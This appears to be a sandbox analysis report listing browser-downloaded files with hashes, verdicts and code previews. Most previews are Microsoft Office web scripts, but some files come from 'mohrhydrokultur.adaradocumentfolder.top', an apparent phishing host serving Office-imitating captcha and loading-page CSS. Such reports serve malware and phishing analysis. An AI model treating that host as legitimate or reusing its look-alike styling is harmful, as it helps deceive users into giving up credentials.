                                                                                      Preview:function getLanguageParameter(n){var t,i;if(UseApiForUILanguage&&Office.context.displayLanguage)return""+n+"="+Office.context.displayLanguage;var f=window.location.search.substr(1),r=f.split("&"),u="";for(t=0;t<r.length;t++)if(i=r[t].split("=",2),i.length==2&&i[0]=="ui"){u=""+n+"="+i[1];break}return u}function getEdgeMajorVersion(){var t=navigator.userAgent,n=t.match(/Edge\/([0-9]+)/i);return n&&n.length>=2?parseInt(n[1]):-1}function getQueryParameter(n){var u,r,t,i;if(window.location.search&&window.location.search.length>1)for(u=window.location.search.substring(1),r=u.split("&"),t=0;t<r.length;t++)if(i=r[t].split("="),decodeURIComponent(i[0])==n)return i.length>1?decodeURIComponent(i[1]):"";return null}function now(){return(new Date).getTime()}function generateGuid(){return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(n){var t=Math.random()*16|0,i=n==="x"?t:t&3|8;return i.toString(16)})}function createSimpleHtml(n,t,i){i===void 0&&(i=null);var r=document.createElemen
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):985
                                                                                      Entropy (8bit):5.175336884396651
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:605C6BD48B2AB0262C0113445494FF4C
                                                                                      SHA1:00CC6621252EB4930486F4837638A0524E5C77E9
                                                                                      SHA-256:405497AC72ADA72A30277E2493A9B00B999DF6CE1B425167B8C405AF45EF0338
                                                                                      SHA-512:53993F9A6359C167302F14F272BF9D8897C2508DF9EFEC38DE1754F9B8737A621C482177981DE9702BEEAC54ACC2EEB1AB166A24533AC2A6FEA7E7C6244AD4F9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://fa000000111.resources.office.net/033f92d3-bc6d-439a-858a-a17acf70360a/1.0.0.5/en-us_web/manifest_web.xml
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0".. xmlns:contentappor="http://schemas.microsoft.com/office/contentappversionoverrides".. xsi:type="ContentApp">.... <Id>bf3a711e-f669-4fd5-8d73-100223695f2b</Id>.. <Version>1.0.0.4</Version>.. <ProviderName>lijia</ProviderName>.. <DefaultLocale>en-US</DefaultLocale>.. The display name of your add-in. Used on the store and various placed of the Office UI such as the add-ins dialog -->.. <DisplayName DefaultValue="Office first party apps sandbox" />.. <Description DefaultValue="Office first party apps sandbox" />.... <Hosts>.. <Host Name="Document"/>.. </Hosts>.... <DefaultSettings>.. <SourceLocation DefaultValue="index.html" />.. </DefaultSettings>.... <Permissions>ReadWriteDocument</Permissions>..</OfficeApp>
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:GIF image data, version 89a, 24 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):695
                                                                                      Entropy (8bit):5.696679956038459
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:648AD2F7EEA95A9B5491DCD2203B2F54
                                                                                      SHA1:5FFA99938410AEBAB10B32308F242437B9432B53
                                                                                      SHA-256:A3596C17DAD9A003D0BFBE0B7BA6765F51391B5C3943660316F01C8E77B323DB
                                                                                      SHA-512:F7984FFEAEC122EFCBE36218979BB4C35E27007CC091BA5A8829BA5088999A3F9F7A7D5E11D90A05904D58644EC0B4E5EE1D57C68DD5270B7F456A762D8D699A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GIF89a.............!..NETSCAPE2.0.....!.......,.................0.+......H.....V..!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,..............z...cr...!.......,.................dp.,.....H.....;..!.......,..........2......dp.,...QP.Td......F.[...v..?y...."......!.......,..........0......dp.,...QP.Td..........gO:.......Q..!.......,..........*......dp.,...QP.Td..........g.|.}.)..!.......,..........&......dp.,...QP.Td............>..!.......,..........#......dp.,...QP.Td........L.6V..!.......,.................dp.,.....H.....;..;
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11252)
                                                                                      Category:downloaded
                                                                                      Size (bytes):23416
                                                                                      Entropy (8bit):5.332438417908476
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5497DFC3FD0E40DB230E1D59B34797DD
                                                                                      SHA1:170F2C748BEDED58B7DAE3C6A3F8A5019A4534C1
                                                                                      SHA-256:BA445B74289601E54A8FEBA0951364685EA140F0A0B9FBE2A355F1001A16FBE5
                                                                                      SHA-512:1AD647990201BD2BEA9109206A6E851D6E98FBFFD029C8653B29C7CEC78628608237CEDAB86088105DA3BA197C5F302FF568065803B2DAB4F21097E8A48AB681
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-10-11.012/wacowlhostwebpack/2.js
                                                                                      Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],{356:(e,t,n)=>{n.d(t,{a:()=>O});var a=n(0),i=n(28),r=n(114);const o=function(){function e(){}return e.start=function(e){var t=new r.a(e);return new i.c(function(e,n){t.start(e,n)},function(){t.abort(!0)})},e.startAndPostProcess=function(e,t){var n=new r.a(e);return new i.c(function(e,a){n.start(function(n,a){e(t(n,a))},a)},function(){n.abort(!0)})},e}();var s=n(68),c=n(18),d=n(14),l=n(99),u=n(743),f=n(83),p=n(36),m=n(45),_=n(744),h=n(4),b=n(1),g=n(80),v="Authorization";function y(e){var t=new m.a(e);return"".concat(t.authority,"/{ length: ").concat(t.path.length,", segments: ").concat(t.segments.length," }")}var S=n(480),D=!b.a.isActivated("814227A9-5B1C-411D-8434-601C47E5BA61"),I=window&&window.performance,x={activityLimitReached:!0,malwareDetected:!0,nameAlreadyExists:!0,resourceModified:!0,resyncRequired:!0,quotaLimitReached:!0,accessRestricted:!0,childItemCountExceeded:!0,entityTagDoesNotMatch:!0,fragm
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (20946), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):21179
                                                                                      Entropy (8bit):4.946956269702156
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:92A3DDF4C14AF9EB4DB2939A2B2712AC
                                                                                      SHA1:81B322775A3E9E9335FB780179B6B922759CE6FF
                                                                                      SHA-256:5B6D3F98F8A755878F226B38FDB1F7C31E67B456221F253B70F95AA331668594
                                                                                      SHA-512:1A61A585D707BFC1E78B8734A89D1C73673324E1ABF5CF579799D73860A5160119FDCD2C910C8B77C827C42E76D1A7FEEA2D43E9ADBD3B95223514A34E563D61
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://appsforoffice.microsoft.com/lib/1.1/hosted/en-us/office_strings.js
                                                                                      Preview:if (window.Type && window.Type.registerNamespace) {..Type.registerNamespace("Strings");} else {..if(typeof(window['"Strings"']) == 'undefined') {..window['"Strings"'] = new Object(); window['"Strings"']. __namespace = true;..}....}..Strings.OfficeOM=function(){};if (Strings.OfficeOM.registerClass) Strings.OfficeOM.registerClass("Strings.OfficeOM");Strings.OfficeOM.L_APICallFailed="API Call Failed";Strings.OfficeOM.L_APINotSupported="API Not Supported";Strings.OfficeOM.L_ActivityLimitReached="Activity limit has been reached.";Strings.OfficeOM.L_AddBindingFromPromptDefaultText="Please make a selection.";Strings.OfficeOM.L_AddinIsAlreadyRequestingToken="Add-in is already requesting an access token.";Strings.OfficeOM.L_AddinIsAlreadyRequestingTokenMessage="The operation failed because this add-in is already requesting an access token.";Strings.OfficeOM.L_ApiNotFoundDetails="The method or property {0} is part of the {1} requirement set, which is not available in your version of {2}.";String
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (24306), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):24452
                                                                                      Entropy (8bit):5.328428296210481
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:AC459993971D136B5C420665B272E101
                                                                                      SHA1:3C84797F6C43434519212E1AE74E84C4BC9E133A
                                                                                      SHA-256:883922A710E857E94B35FD6748792782280A859E154E4DB2E4C0B4876DFA61AE
                                                                                      SHA-512:35DDE4930521684FC51EB5E521D23259DB9A17455F572CCE8BF3E319BE1D69B0571D6E38AB9C72F5801E8777F567AED9742970E6409C0C77C255E995362B5477
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/hammer.min.js
                                                                                      Preview:/*! Hammer.JS - v2.0.8 - 2019-03-19.. * http://hammerjs.github.io/.. *.. * Copyright (c) Jorik Tangelder;.. * Licensed under the MIT license */..(function(window,document,exportName,undefined){"use strict";function ifUndefined(val1,val2){return val1===undefined?val2:val1}var STATE_POSSIBLE=1;var STATE_BEGAN=2;var STATE_CHANGED=4;var STATE_ENDED=8;var STATE_RECOGNIZED=STATE_ENDED;var STATE_CANCELLED=16;var STATE_FAILED=32;var assign=void 0;if(typeof Object.assign!=="function"){assign=function assign(target){if(target===undefined||target===null){throw new TypeError("Cannot convert undefined or null to object")}var output=Object(target);for(var index=1;index<arguments.length;index++){var source=arguments[index];if(source!==undefined&&source!==null){for(var nextKey in source){if(source.hasOwnProperty(nextKey)){output[nextKey]=source[nextKey]}}}}return output}}else{assign=Object.assign}var assign$1=assign;var _uniqueId=1;function uniqueId(){return _uniqueId++}function each(obj,iterator,con
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (33654)
                                                                                      Category:dropped
                                                                                      Size (bytes):33712
                                                                                      Entropy (8bit):5.312964320999572
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:B6E215C559C24CAFD09273E9BFAFD357
                                                                                      SHA1:ECCF0B92955DACEAF6FAD3A9DE7C36EB65B341CB
                                                                                      SHA-256:DAF0C5F563BBD6915BEA269FA160B52176BAE7AA972FFA7F0D9345165A4825F3
                                                                                      SHA-512:06FDF7EC3F675C5B458F16E206FE8F64624A3046531EA5484C72CA58136D449DF1638B9AE9CD78C0E355A4A05D373E18D89F96743CCAFF5700DECD1BD52620E9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={i:s,l:!1,exports:{}};return e[s].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.m=e,i.c=t,i.d=function(e,t,s){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:s})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,t){if(1&t&&(e=i(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var s=Object.create(null);if(i.r(s),Object.defineProperty(s,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)i.d(s,r,function(t){return e[t]}.bind(null,r));return s},i.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="",i(i.s=0)}([function(e,t,i){"use strict";var s;function r(e){if(!e)return;const t={};return e.forEac
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (14666), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):14666
                                                                                      Entropy (8bit):5.192998441009612
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:8880E957219B056B26B67D88CB7FFFF5
                                                                                      SHA1:BE024ABFE99C2DC447191E2C59DD96FD9352E2C4
                                                                                      SHA-256:4BBB0DBB03A136E993BB2FB363455E7DCABF84CBB17DE37AD6168B9326E56909
                                                                                      SHA-512:1E611B1C8D3B7DE4CEE215C989885A6F8256B89A51621B77598A9A363AAF2897FC439DD73860234BA77AB682B84D05437CE0DBBDA59C3C1B5CC9D16662897EC5
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:if("undefined"!=typeof jSanity)throw"jSanity has been defined, please check if there's any duplicate reference.";jSanity={},function(e){"use strict";var t={inputString:"",maxWidth:"600px",maxHeight:"200px",overflow:"hidden",allowLinks:!0,linkClickCallback:null,customProtocols:{},allowRelativeURLs:!1,allowAudioVideo:!1,unsupportedContentCallback:null,externalContentCallback:function(e,t,r,o){var i;if("attribute"===e&&"src"===t)for(var n in o)if(o.hasOwnProperty(n)&&r.substring(0,n.length)===n){i=!0;break}return i||(r="CSSURL"===e?'url("about:blank")':"about:blank"),r},isolatedTargetDOM:!1,directModifySource:!0,attributePrefix:"jSanity",dataAttributeCallback:null,debugLevel:0,onFinishedCallback:null},r=function(){this.sync=!0,this.jobs=[],this.id=r.globalId++,this.listnerPosfix=0,this.onCompletedListners={},this.onNewJobAddedListners={},this.useSync=function(){this.sync=!0},this.useAsync=function(){this.sync=!1},this.addNewJob=function(e){for(var t in this.jobs.push(e),this.onNewJobAdded
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1248494
                                                                                      Entropy (8bit):5.538461680476485
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:669A6FE594693F2596A28853D92FB309
                                                                                      SHA1:FE5DE41CFEFAC7DDEFAD06322238D30FAFEEC580
                                                                                      SHA-256:60DD865806D547201402D473A6C7C2635477A33F3E871428557143273872F13C
                                                                                      SHA-512:C17A899B62B5CFF4DC5531969BF61E24F58C308AC2503A78A16DAB76BD1167BDC5FE904869F4BF133D77972EB6A8853F664A3269BE21B42DE1226AB5A1B72384
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function _define_property(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{},o=Object.keys(n);"function"==typeof Object.getOwnPropertySymbols&&(o=o.concat(Object.getOwnPropertySymbols(n).filter((function(e){return Object.getOwnPropertyDescriptor(n,e).enumerable})))),o.forEach((function(t){_define_property(e,t,n[t])}))}return e}function ownKeys(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,o)}return n}function _object_spread_props(e,t){return t=null!=t?t:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):ownKeys(Object(t)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(t,n))})),e}function _object_wi
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (3379)
                                                                                      Category:downloaded
                                                                                      Size (bytes):4210
                                                                                      Entropy (8bit):5.364580472613482
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:59087D72EEDCB7650C9D5D6088440DD3
                                                                                      SHA1:97B607FCE11F640E5764699038E50A76EB98944B
                                                                                      SHA-256:E0E3FB0FE5CA541950CF8DD213FBE9E8957A3DB0010B515AD01ADFF6CA908A3E
                                                                                      SHA-512:4F213391C01CFB017AB290007F3C7E66DB9B2A7A1EA4B4843DD52B0D7E5B1A5C04896BF1856806964F5A49C38A66403A8CDFE2C8C3EAF82C8318012F444DCD3F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/captcha/style.css
                                                                                      Preview:@font-face{font-family:FabricMDL2Icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/o365icons-mdl2.woff') format('woff');font-weight:400;font-style:normal}@font-face{font-family:office365icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/office365icons.woff?') format('woff');font-weight:400;font-style:normal}#loadingScreen{position:fixed;top:0;bottom:0;left:0;right:0;background-color:#fff}#loadingLogo{position:fixed;top:calc(50vh - 90px);left:calc(50vw - 90px);width:180px;height:180px}#MSLogo{position:fixed;bottom:36px;left:calc(50vw - 50px)}.dark #loadingScreen{background-color:#333}.darkNew #loadingScreen{background-color:#1f1f1f}.:root{--s:180px;--envW:130px;--envH:71px;--calW:118px;--sqW:calc(var(--calW) / 3);--sqH:37px;--calHH:20px;--calH:calc(var(--sqH) * 3 + var(--calHH));--calY:calc(var(--calH) + 20px);--calYExt:calc(var(--calH) - 80px);--calYOverExt:calc(var(--calH) - 92px);--flapS:96px;--flapH:calc(0.55 * var(--envH));--flapScal
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65437)
                                                                                      Category:downloaded
                                                                                      Size (bytes):642651
                                                                                      Entropy (8bit):5.331965832262166
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:1F17361FB29A6080C472FE5C698043C9
                                                                                      SHA1:871666BDC70C55EFAAD11AF36162CE91A65956EF
                                                                                      SHA-256:CC4307363023A70100271E492118FCE784D287479B2AC86BDB3DBD1FB2BAAF9F
                                                                                      SHA-512:730C7778E20545E08C5C65E2321FEFC6D93CB5C0F0A5F4254CF3B4E6ED29C1D125812EDBF5359AC418B8B4CC15DC6B2E92EC2243B265FE43A47A35AA0E582176
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://wise.public.cdn.office.net/wise/owl/sharedauthclientmsal.39dcdf70a2434436117b.js
                                                                                      Preview:/*! For license information please see sharedauthclientmsal.39dcdf70a2434436117b.js.LICENSE.txt */.var Microsoft;!function(){var e,t,n,r,o,i,a={6839:function(e,t,n){"use strict";n.d(t,{nr:function(){return u}});var r,o=n(2440),i=n(9565),a="__stylesheet__",s="undefined"!=typeof navigator&&/rv:11.0/.test(navigator.userAgent),c={};try{c=window||{}}catch(e){}var u=function(){function e(e,t){var n,r,i,a,s,c;this._rules=[],this._preservedRules=[],this._counter=0,this._keyToClassName={},this._onInsertRuleCallbacks=[],this._onResetCallbacks=[],this._classNameToArgs={},this._config=(0,o.Cl)({injectionMode:"undefined"==typeof document?0:1,defaultPrefix:"css",namespace:void 0,cspSettings:void 0},e),this._classNameToArgs=null!==(n=null==t?void 0:t.classNameToArgs)&&void 0!==n?n:this._classNameToArgs,this._counter=null!==(r=null==t?void 0:t.counter)&&void 0!==r?r:this._counter,this._keyToClassName=null!==(a=null!==(i=this._config.classNameCache)&&void 0!==i?i:null==t?void 0:t.keyToClassName)&&void
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (8369), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):8369
                                                                                      Entropy (8bit):4.927867822572244
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:3650AB0863890CA0F8ED7CB854D03F2B
                                                                                      SHA1:86530F1BDFE32F6EE2C0B3770C648E13929A22D5
                                                                                      SHA-256:A77B85A1922F1E45FA8610E3D68CA6CA1EE887499F3148D5922A304D44E03EDF
                                                                                      SHA-512:9F43BBF3448D687D2FFCD554FC47C7136EEA20685D508140D2496D00A01108326ED32FC16164E59BF32794608DC31C42DD394F44B5E4EF51CA1A7283FFFF006F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/1033/onenote-navpane-strings.min.js
                                                                                      Preview:var OnenoteNavpaneStrings={AddPage:"Add page",AriaAddPage:"Add page",AddSection:"Add section",AriaAddSection:"Add section",AriaCollapseNotebookLabel:"Select to go back to the section and page navigation.",AriaPageLabel:"Page. Select to open page contents.",AriaSelectedPageLabel:"Page. Selected. Press Ctrl + F6 to navigate to page contents.",AriaSectionLabel:"Section. Select to switch to this section.",AriaSelectedSectionLabel:"Section. Selected. Press Ctrl + F6 to navigate to page list of the section.",AriaSectionGroupLabel:"Section Group. Select to expand and display inner sections.",AriaVersionLabel:"Version. Select to open version contents.",AriaSelectedVersionLabel:"Version. Selected. Press Ctrl + F6 to navigate to version contents.",AriaConflictLabel:"Conflict. Select to open conflict page contents.",AriaSelectedConflictLabel:"Conflict. Selected. Press Ctrl + F6 to navigate to conflict page contents.",AriaNotebookLabel:"Notebook. Select to switch to this notebook.",AriaNavpaneLabe
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (22010)
                                                                                      Category:dropped
                                                                                      Size (bytes):22064
                                                                                      Entropy (8bit):4.682868670437469
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:C5E5AF3E566863CC521E9AC58F82305F
                                                                                      SHA1:EF9A8CE0980E73F7DF4FF51D8CFF68E8FCA2F6E2
                                                                                      SHA-256:5AD6073D9E96064AFF3B050FC9CBF896878BE17457DC02130FCFA63937E334F0
                                                                                      SHA-512:2A4115572047050BFFB12EB3DE200A6279802CD8B6C39FD4CB42D1E5A1BE34ED4B5F0071A4BC2BE8D1461B9C6656F46329BD5C491F18A2ACB4222A151EED8281
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:"use strict";(globalThis.onenoteOnlineChunks=globalThis.onenoteOnlineChunks||[]).push([[814],{47212:function(a,i,t){t.r(i),t.d(i,{default:function(){return n}});var x=t(95202);const e=t(72540),r=new x.U("oreo-loadingSpinner");class s{static getData(){return new Promise(((a,i)=>{a(t(29717))}))}}var k=null;class n{static startAnimation(){const a="OreoLoadingSpinner",i=document.getElementById("WACPageLoadingIndicator");if(i){if(k&&window.clearTimeout(k),k=window.setTimeout((()=>{document.getElementById(a)&&r.warningTag(591407137,"OneNote Oreo Spinner is active for too long 30000")}),3e4),!this.spinner)return new Promise(((t,x)=>{r.infoTag(591407138,"OneNote Oreo Spinner is loading."),s.getData().then((t=>{let x=document.createElement("span");x.id=a,x.className="oreoLoadingSpinner",i.insertBefore(x,i.firstChild);let r={container:x,renderer:"svg",loop:!0,autoplay:!0,animationData:t};this.spinner=e.loadAnimation(r),this.spinner.play()})).catch((a=>{r.errorTag(591407139,"Error while loading O
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):179047
                                                                                      Entropy (8bit):5.525712599528241
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:28AE8A97F4ABA21B7C2E35059829E3A2
                                                                                      SHA1:B7B1145ADB4697AD6D781BF6D63F9C6F7FBF3A93
                                                                                      SHA-256:6DEFAE634ACD4E2356838DEE0DD0213411310C26A2D9720C2C85058B7771B1BE
                                                                                      SHA-512:DE609110BF4206675F41F2152CE38D1FF8D5E94F6FD7195FA12A37C7615EFB10FEED8D1436C348264A2F0067E850D234FBE3A10B01B9F73AAD602FEFC523B0DE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var Microsoft;!function(){"use strict";var t,e,n,o,i={32812:function(t,e,n){n.d(e,{h:function(){return s}});var o=n(13260),i=n(40426),r=n(19665),s=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.value=null,e.hasNext=!1,e.hasCompleted=!1,e}return o.C6(e,t),e.prototype.U=function(e){return this.hasError?(e.error(this.thrownError),r.y.EMPTY):this.hasCompleted&&this.hasNext?(e.next(this.value),e.complete(),r.y.EMPTY):t.prototype.U.call(this,e)},e.prototype.next=function(t){this.hasCompleted||(this.value=t,this.hasNext=!0)},e.prototype.error=function(e){this.hasCompleted||t.prototype.error.call(this,e)},e.prototype.complete=function(){this.hasCompleted=!0,this.hasNext&&t.prototype.next.call(this,this.value),t.prototype.complete.call(this)},e}(i.B7)},39188:function(t,e,n){n.d(e,{t:function(){return s}});var o=n(13260),i=n(40426),r=n(92581),s=function(t){function e(e){var n=t.call(this)||this;return n.N=e,n}return o.C6(e,t),Object.defineProperty(e.prototype,"va
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):105456
                                                                                      Entropy (8bit):5.227044897009775
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4C674D8D4294C4A6B763AA1FC836827C
                                                                                      SHA1:88DEC91B36CAD6555FB73B9ED28D6FDC7A944467
                                                                                      SHA-256:99855F2433E80A925CE4CABD975E2DD7A9FE01FAB8E164B26F67010FF5769EC0
                                                                                      SHA-512:80B73385D21512B2FD10690F08EE99B6FD2D1123920ABACF7A864841F07F817EE1BCC5C466ACC27209A094E31D334E4532AE7EFE7F2F7D7427E67CC567F20733
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/css_/mbqXv9vNtZfCfYM
                                                                                      Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):220858
                                                                                      Entropy (8bit):5.627514521924271
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4015DAD6F999BE9E8CD244F9697DBB6D
                                                                                      SHA1:F33976CAA136D6C90B73F1BCB4908C3BB06FD0ED
                                                                                      SHA-256:3AC57C0E9D926E64A8E2A561B29B739327CC2007357612B507D72FAF6FC06A08
                                                                                      SHA-512:8570A558441E112B3A6208955784962CA88E2BE33016D53BADB50196EA7CC6E531842632D0005930EA2EA0D001AF158BDEA76F21120562AF09D50F2F5F39A793
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var TellMeModel={"m":{"":76},"t":[0,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,6,6,6,6,6,6,6,7,2,10,10,10,7,4,4,4,4,4,4,4,4,4,4,7,7,7,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,7,7,7],"n":[338,425,428,431,434,437,440,444,447,450,453,456,459,462,483,512,521,530,539,552,565,574,583,592,601,614,627,640,653,666,679,688,701,714,727,736,749,762,775,788,801,814,827,843,861,885,909,930,959,980,993,1006,1026,1047,1057,1067,1088,1097,1107,1116,1126,1136,1157,1191,1196,1201,12
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11667), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):11667
                                                                                      Entropy (8bit):4.97980937003193
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A1D892F1368C7F3B1DFB75057B936B66
                                                                                      SHA1:91EC4980BFA5B301199B574E6240A618247679F9
                                                                                      SHA-256:2DB70125E37F651D09A6D03D593A65E09668E6267CCA1257251328517F7EAEFC
                                                                                      SHA-512:F2834E3B673CF7BFBABF9A92A0D4524F5696996CA67EBD6605F08206C95C3DCCE3AB95E4297452186074EB92827BFA4D811A61959EBA60544393BA14F4C7A3B9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
